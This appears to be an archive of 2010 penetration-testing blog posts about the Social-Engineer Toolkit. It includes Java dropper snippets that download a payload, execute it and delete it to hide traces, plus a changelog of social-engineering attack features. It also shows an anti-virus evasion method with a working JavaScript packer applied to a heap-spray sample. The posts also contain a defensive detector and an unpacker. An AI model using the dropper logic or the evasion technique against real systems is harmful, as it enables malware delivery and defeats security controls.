July 31, 2010

Blackhat and Defcon PoC code released

Posted by relik @ 7:12 am

Below are the download links for the Metasploit modules and PowerShell sample code released at Blackhat and (soon to be) Defcon with Josh Kelley (winfang). The talk covered the powerful ability to perform advanced tasks through PowerShell and how you can utilize PowerShell on penetration tests. You can get the code here:

Metasploit Modules

PowerShell Samples

Thomas Werth Java Applet Open-Sourced

Posted by relik @ 6:57 am

Releasing Java Applet Source Code by Thomas Werth

When you are reading this blog, you should already know about the Thomas Werth Java Applet Attack that’s incorporated into the Social-Engineer Toolkit. The attack vector itself has been closed source up until this point. It does not rely on exploiting a vulnerability at all and is universal in nature: it targets Java installations on Windows, Linux, and Mac systems and works on fully patched and updated (and old) Java implementations. Big thanks go to Java for their feature-rich APIs and awesome security model :) The question that gets posed to me on a number of occasions is, why did I write an attack vector that is multi-platform and can attack fully patched systems? Simple answer: “For user education”. Java is often considered a secure platform with a sandboxed environment, and most developers believe they are impervious to attack. This release isn’t a discussion on whether or not Java is secure; it is more to reveal that signed Java applets are susceptible to multiple attack vectors, patched or not. It is similar to every application you download from the internet and run on your PC. There is one slight difference though: a Java applet can lie to you and pretend it is issued by Microsoft or Sun, because the publisher shown in the trust prompt is whatever name the applet’s certificate carries, so the user is never clearly alerted that it could be dangerous.


As a learning and awareness effort, I decided to write a proof of concept and make users learn the hard way :) A few weeks before writing my applet I stumbled across SET and virtually met David. Long story short: we joined forces, and I hope you like the result. So let’s talk about the internals of the applet. The applet reads the operating-system-specific payload path and the URL of the next page to show from its parameters. It then checks which platform it is currently running on and downloads the platform-specific payload using the browser it runs under. The download is saved as a file in the system-specific temp folder. The browser is then redirected to the next page and the downloaded file is started. Finally, the applet waits until the payload has finished executing and wipes the file from the hard disk. That’s all. Really, this is enough to beat most security controls on modern systems: to compromise a system it is enough to fool the user, who relies on what is on the screen, or to trust a human and rely on what we are used to.

A few snippets of the source code show the critical functions.

Initial check of the current system:

// get the path to the temp folder ("pfad" is German for "path")
String pfad = System.getProperty("java.io.tmpdir") + File.separator;
// get the operating system name, lower-cased for matching
String os = System.getProperty("os.name").toLowerCase();

Check if it is a Windows system and prepare the download URL of the Windows payload:
if (os.indexOf("win") >= 0) // Windows
{
    // the payload URL is handed to the applet as the "WIN" parameter
    downParm = getParameter("WIN");
    osType = 0;
    // the payload is dropped as <tmpdir>\java.exe
    pfad += "java.exe";
}

The download itself is done with a BufferedInputStream and a FileOutputStream. The next part of the code I will show is the way the URL is changed to fool the user even more. When utilizing the Social-Engineer Toolkit and the Site Cloner, a website is cloned and the victim is tricked into accepting the malicious Java applet. Once the user accepts the applet and the payload is downloaded and executed on the system, the victim is redirected to the original cloned site and has no idea what just occurred.

// get the parameter nextPage
String page = getParameter("nextPage");
// check if the parameter is set
if (page != null && page.length() > 0)
{
    // create a URL from the parameter and tell the browser to navigate to it
    URL urlPage = new URL(page);
    getAppletContext().showDocument(urlPage);
}

Now everything is ready to launch the payload. This is done with a few lines of code; the Windows part is shown here as an example.

// check if the operating system is Windows
if (osType < 1) // Windows
{
    // Java API call to create a new process,
    // which uses cmd.exe to execute the freshly downloaded payload.
    f = Runtime.getRuntime().exec("CMD.exe /c start " + pfad);
    // wait till the payload has finished execution
    f.waitFor();
    // wipe the file to cover your tracks
    (new File(pfad)).delete();
}

That’s it. Hopefully there’s still some magic left and you don’t blame me for how easy this attack is. One caveat on the Windows snippet: "cmd /c start" returns as soon as it has launched the new process, so waitFor() comes back almost immediately, and while the payload image is still mapped Windows will refuse the delete(); to really wait for the payload to end, use "start /wait" or run the file directly instead of through start.
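The flow described above leaves a recognisable footprint in the HTML that serves the applet: an applet tag whose parameters name a downloadable executable and a page to land on afterwards. The following script is an added example of a check for that footprint, written for this page in Python; it is not part of the applet, SET, or any vendor product. It assumes only the two parameter names the snippets above show ("WIN" and "nextPage"); the executable extensions, the sample pages and the class names in them are constructed for the example, and the parameter names for the other platforms are not given in the post, so a real rule would need them added.

```python
import posixpath
from html.parser import HTMLParser
from urllib.parse import urlparse

# Parameter names taken from the applet snippets above. Only "WIN" and
# "nextPage" appear there; the Linux/Mac names are not in the post.
PAYLOAD_PARAMS = {"win"}
REDIRECT_PARAMS = {"nextpage"}
# Extensions treated as "dropped to disk and executed" (assumption for the example).
EXEC_EXTENSIONS = {".exe", ".bin", ".sh", ".jar"}


class AppletCollector(HTMLParser):
    """Collect every <applet> tag together with its <param> children."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
        elif tag == "param" and self._current is not None:
            # param names are matched case-insensitively ("WIN" vs "win")
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet" and self._current is not None:
            self.applets.append(self._current)
            self._current = None


def assess(applet):
    """Return the reasons an applet looks like the dropper described above."""
    reasons = []
    params = applet["params"]
    for name in sorted(params):
        value = params[name]
        if name in PAYLOAD_PARAMS:
            reasons.append(f"OS-specific payload parameter {name!r} present")
        url = urlparse(value)
        if url.scheme in ("http", "https"):
            ext = posixpath.splitext(url.path)[1].lower()
            if ext in EXEC_EXTENSIONS:
                reasons.append(f"parameter {name!r} points at a downloadable executable: {value}")
    if any(name in REDIRECT_PARAMS for name in params):
        reasons.append("redirect target (nextPage) to land the victim on the cloned site afterwards")
    return reasons


def scan(html):
    """Return one record per applet that trips at least one rule."""
    collector = AppletCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for applet in collector.applets:
        reasons = assess(applet)
        if reasons:
            findings.append({"code": applet["attrs"].get("code", "?"), "reasons": reasons})
    return findings


# Constructed sample pages (not captured from SET): a cloned login page carrying
# the dropper applet, and a harmless applet for comparison.
CLONED_PAGE = """<html><body>
<h1>Example Bank - Online Banking</h1>
<applet code="Signed.class" archive="Signed.jar" width="1" height="1">
  <param name="WIN" value="http://192.0.2.10/payload.exe">
  <param name="nextPage" value="https://www.example-bank.test/login">
</applet>
</body></html>"""

BENIGN_PAGE = """<html><body>
<applet code="Clock.class" archive="clock.jar" width="200" height="100">
  <param name="timezone" value="UTC">
</applet>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("cloned", CLONED_PAGE), ("benign", BENIGN_PAGE)):
        print(label, "->", scan(page))
```

Run against a proxy cache or a captured page, scan() gives three reasons for the cloned page and nothing for the clock applet. The check is on the serving page, not on the JAR, so it works whether the applet is signed by a self-signed certificate or not; signature validation of the JAR itself is a separate control.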

In closing, the point of all of this is to show you that even with the most heavily patched system, running the latest and greatest, there is always room for exceptions. This method makes it easy to coax a victim into believing that this is not an attack but a normal experience. We as security professionals typically focus heavily on patches and the latest vulnerabilities while we have significant exposure through frameworks and applications that will never be patched. It is easier for us to believe what we see on a screen, or to trust a human and rely on what we are used to, than to look at what is actually occurring.

Finally I’d like to thank David for his excellent work on SET and his fantastic cooperation! Thank you dude!

July 4, 2010

Vegas – And so it begins…

Posted by relik @ 12:31 am

Getting ready for some craziness coming up soon in Vegas. Luckily, before the birth of my twins, the majority of our presentations and code was already finished. Be sure to catch me speaking at BSIDESLV, BlackHat, and Defcon this year! I’ll be co-presenting with one of my buddies, Josh Kelley (winfang98 on Twitter), on a slew of topics. Just want to say you’ll want to swing by: we are releasing new versions of tools, Metasploit modules, new tool releases, and extra code. Wanted to give you a breakdown of each presentation and what to expect.

First things first, the Social-Engineer Toolkit v0.6 will be getting released and this is a whopper. Probably the largest release I have ever put through on SET, and it will be an amazing one. I would highly recommend BSIDESLV; it has become my favorite conference out there, period. If you’re missing this one you’re basically missing the entire point of going to these conferences! Here is the changelog so far on what to expect:

* A number of bug fixes throughout SET and better error handling
* Added the tabnabbing attack vector
* Added favicon pulling per site on tabnabbing
* Fixed dynamic import bug with reloading modules after use
* Added Man Left in the Middle (MLITM) from Kos
* Added the latest IE and Adobe exploits
* Rewrote the HTTP web server handler for WebDav based exploits, it will force SET to use port 8080 as the web server as MSF requires WebDav on 80.
* Rearranged the initial web attack vector menu, it needed to be reversed
* Added the ability to specify your own custom executable for MSF encoding (-x) within the config/set_config file, the new option is called ‘CUSTOM_EXE’
* Added checks for BeautifulSoup, it is now a requirement for SET for the MLITM attack
* Fixed the no encoding issue with Java Applet Attack Vector, when specifying no encoding it will not prompt you to encode the payload
* Fixed bleed over colors when bombing out of any of the SET menus
* Added the ability to be able to customize MLITM web server port address in set_config, default is 80.
* Fixed an issue with Java Applet attack where if WEB_PORT was changed from 80, the Windows and NIX payloads would not deploy properly based off of port change
* Fixed an issue where importing your own executable with the Java Applet attack would fail and not work properly.
* Fixed where OSX and LINUX payloads would still be asked for in payloadgen if not using the Java Applet attack.
* Added the new Teensy Arduino attack vector menu that can be used with the Teensy USB HID devices for physical/social-engineering attacks
* Fixed issue where ettercap was not properly performing DNS_POISON attacks, should now dns poison properly.
* Removed the IP address challenge question when importing your own exe
* Fixed issue where other python applications would close when exiting SET
* Rewrote html handler to fix stderr and stdout issues with subprocess and ettercap handlers, should close properly when exiting SET now
* Fixed the main bug with Linux/OSX via Java Applet and no shell being piped, should now be 100 percent operable (thanks Thomas Werth).

I will be demoing all the new features and releasing SET v0.6 at BSIDESLV exclusively, be sure to be there 7/28/2010 at 3:00PM!

Moving on to BlackHat, Josh and I will be doing the PowerShell – It’s time to own presentation on 7/29/2010 at 10:00AM. Josh and I have put a ton of time into it and will be releasing two new Metasploit modules/Meterpreter scripts, demoing new tools we will be releasing the code for, and showing some new PowerShell bypass techniques; you absolutely don’t want to miss this one.

Last but not least, our Defcon presentation, the PowerShell omfg talk, will be on Sunday at 12:00PM. Josh and I will be showing everything we did at BlackHat and a lot more, including some additional tool releases and a much more in-depth talk.

Phew, it’s going to be a busy week for us, and I can tell you I think Josh’s fingers and mine are bleeding from the amount of code pumped out for these three talks. As always, be sure to check back here for more news and updates; you can also follow me and Josh on Twitter: dave_rel1k and winfang98

See you in Vegas!

June 11, 2010

Anti-Virus Evasion through JavaScript Obfuscation

Posted by relik @ 10:08 pm

An easy way of utilizing Metasploit and an online packer to evade anti-virus when performing browser-side exploitation. Metasploit obfuscates a lot of things very well, however certain patterns still get picked up by anti-virus (specifically the %u encoding). This demonstration is a simple way of getting around that and evading anti-virus.

You can use the packer here:

http://dean.edwards.name/packer/
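To see what the packer actually does to the %u pattern, here is an added Python example, written for this page and neither Metasploit code nor the packer’s own source: a minimal packer producing the p,a,c,k,e,r format the linked tool emits, and a static unpacker that reverses it without running any JavaScript. The bootstrap text is reproduced only so the output looks like the real thing; the protected-word handling follows the same idea as the original packer; the heap-spray snippet used as input is a constructed stand-in, not Metasploit output.

```python
import re

WORD = re.compile(r"\w+")
BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"

# The packer's runtime bootstrap. pack() prepends it so the output has the
# familiar eval(function(p,a,c,k,e,r){...}) shape; unpack() never executes it.
BOOTSTRAP = (
    "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);"
    "k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);"
    "return p}"
)
# Argument list at the end of a packed blob: ('payload',base,count,'k|e|y|s'.split('|'),0,{})
TAIL = re.compile(
    r"\('((?:\\.|[^'\\])*)',(\d+),(\d+),'((?:\\.|[^'\\])*)'\.split\('\|'\),0,\{\}\)\)$"
)


def encode(index, base=62):
    """Token for word number `index`: digits 0-9, a-z, then A-Z, as the bootstrap computes it."""
    head = "" if index < base else encode(index // base, base)
    r = index % base
    return head + (chr(r + 29) if r > 35 else BASE36[r])


def js_escape(s):
    return s.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")


def js_unescape(s):
    return re.sub(r"\\(.)", lambda m: "\n" if m.group(1) == "n" else m.group(1), s)


def pack(script, base=62):
    """Replace every \\w+ word with a short token and wrap the result in the bootstrap."""
    words = list(dict.fromkeys(WORD.findall(script)))  # distinct words, first-seen order
    codes = [encode(i, base) for i in range(len(words))]
    slots = [None] * len(words)
    # A word that is itself a valid token (e.g. "0" or "a") must keep exactly that
    # index, otherwise the unpacker's \b-token\b replacement would clobber it.
    free = []
    for w in words:
        if w in codes:
            slots[codes.index(w)] = w
        else:
            free.append(w)
    free = iter(free)
    slots = [s if s is not None else next(free) for s in slots]
    index = {w: i for i, w in enumerate(slots)}
    payload = WORD.sub(lambda m: codes[index[m.group()]], script)
    # self-mapping words get an empty keyword slot; the bootstrap's if(k[c]) skips them
    keywords = "|".join("" if slots[i] == codes[i] else slots[i] for i in range(len(slots)))
    return (BOOTSTRAP + "('" + js_escape(payload) + "'," + str(base) + ","
            + str(len(slots)) + ",'" + js_escape(keywords) + "'.split('|'),0,{}))")


def split_packed(packed):
    """Pull (payload, base, count, keyword_list) out of the wrapper's argument list."""
    m = TAIL.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k packed blob")
    payload, base, count, kw = m.groups()
    return js_unescape(payload), int(base), int(count), js_unescape(kw).split("|")


def unpack(packed):
    """Undo the word substitution statically, i.e. what the bootstrap does at runtime."""
    payload, base, count, keywords = split_packed(packed)
    for c in range(count - 1, -1, -1):
        word = keywords[c]
        if word:
            token = re.compile(r"\b" + re.escape(encode(c, base)) + r"\b")
            payload = token.sub(lambda m, w=word: w, payload)
    return payload


# Constructed stand-in for a browser exploit's heap-spray setup (not Metasploit output).
SAMPLE = ('var sc = unescape("%u0c0c%u0c0c%u9090%u9090");\n'
          'var spray = unescape("%u0c0c%u0c0c");\n'
          'while (spray.length < 0x40000) { spray += spray; }\n')

if __name__ == "__main__":
    packed = pack(SAMPLE)
    print(packed)
    print(unpack(packed) == SAMPLE)
```

Packing the sample turns "%u0c0c%u0c0c%u9090%u9090" into "%3%3%4%4", so a signature written across the repeated %u sequence no longer matches. Two caveats follow directly from the code: the words themselves survive intact in the keyword table ("u0c0c" is still in the blob, just once and without the %), and the eval(function(p,a,c,k,e,r) prefix is itself a well-known pattern, so this buys evasion only against signatures that span word boundaries, and an analyst recovers the original with unpack() in one pass.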


Visit us on irc.freenode.net #backtrack-linux or #social-engineer